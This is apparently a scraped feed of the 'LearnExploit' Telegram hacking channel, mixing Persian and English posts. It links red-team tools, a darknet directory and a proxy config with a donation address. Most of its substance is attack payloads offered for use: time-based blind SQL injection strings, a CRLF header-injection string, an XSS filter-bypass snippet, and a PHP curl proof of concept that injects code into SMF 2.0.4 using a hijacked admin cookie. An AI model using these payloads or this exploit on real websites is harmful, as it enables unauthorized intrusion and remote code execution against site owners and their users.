vless://d88cb128-8dcb-4216-b121-82a901c2ede2@s.thisisforu.sbs:43978?type=tcp&security=none#GR_SV5_MCI_MTN-%40LearnExploit
دویست گیگ داره
دونیت کنین بیشترش میکنم🔥
TRX:
TJqtCmgFUYkptcvzDuW8c4JRQNm5zpUwPA
#v2ray #config
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤🔥5
3am
Sajad Shahi
💔4👍1👎1
❤🔥2⚡1🔥1
MITRE Caldera - Automated Adversary Emulation Platform
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6🆒1
SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7
This media is not supported in your browser
VIEW IN TELEGRAM
Fuzzing and Bypassing the AWS WAF
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3⚡2🔥1
tor.taxi - your ride to the darknet
.onion Link
#Darkweb #Tor
——————
0Day.Today
@LearnExploit
@Tech_Army
.onion Link
#Darkweb #Tor
——————
0Day.Today
@LearnExploit
@Tech_Army
❤1✍1
OriON - OriON is a virtual machine in Spanish that incorporates several tools for Open Source Intelligence (OSINT) on people
Github
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2❤1
CRLF Injection Payload
payload :
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload :
%0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
خالی از لطف نیست دیدنش :
https://youtu.be/GBeEWje0VOI?si=21348IjixXjgryXT
https://youtu.be/GBeEWje0VOI?si=21348IjixXjgryXT
YouTube
ناتکوین، یه گپ با محوریت بازی و اقتصاد
آپدیت ۱۶ می:
نات کوین از طریق ان اف تی و بعد عرضه به پول تبدیل شده و متوسط دوستانی که توش فعال بودن حدود ۲۰۰ تا ۷۰۰ دلار به دست آوردن. متاسفم اگر به خاطر صحبت من به پول نرسیدین ولی دوست داشتین برسین.
۱. منم گفته بودم که اگر آدم ها زیاد بشن، ممکنه سرمایهگذاری…
نات کوین از طریق ان اف تی و بعد عرضه به پول تبدیل شده و متوسط دوستانی که توش فعال بودن حدود ۲۰۰ تا ۷۰۰ دلار به دست آوردن. متاسفم اگر به خاطر صحبت من به پول نرسیدین ولی دوست داشتین برسین.
۱. منم گفته بودم که اگر آدم ها زیاد بشن، ممکنه سرمایهگذاری…
👍7
little payload to bypass filters (in the proper context)
#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
/*${/*/;{/**/(alert)(1)}//>
#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍2❤1⚡1
👍2
Sql Injection Payload
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👍1
مدیر وبسایت Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد!
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
😢16👍2❤1
LearnExploit
#VMware #Remote #Code
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6❤3👍1🔥1
SMF 2.0.4 admin payload code execution
⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.
⚪️ payload code must escape from \', so you should try with something like that:
⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
⚪️ For character_set - another story, as far as I remember, because here we have
⚪️ a nice stored xss. ;)
⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:
Code:
#Execution #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
exploited by php injection.
Code:
<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
#Execution #XSS #Payload
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9⚡3👍2👨💻1
Mantis is a command-line framework designed to automate the workflow of asset discovery, reconnaissance, and scanning. It takes the top-level domains as input, then seamlessly progresses to discovering corresponding assets, including subdomains and certificates. The tool performs reconnaissance on active assets and concludes with a comprehensive scan for vulnerabilities, secrets, misconfigurations and phishing domains - all powered by a blend of open-source and custom tools.
cd mantis/setup/docker
./docker-setup-macos.sh
./docker-setup-ubuntu.sh
LearnExploit
#Automates #Discovery #Vulnerability #Scanning
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2👍1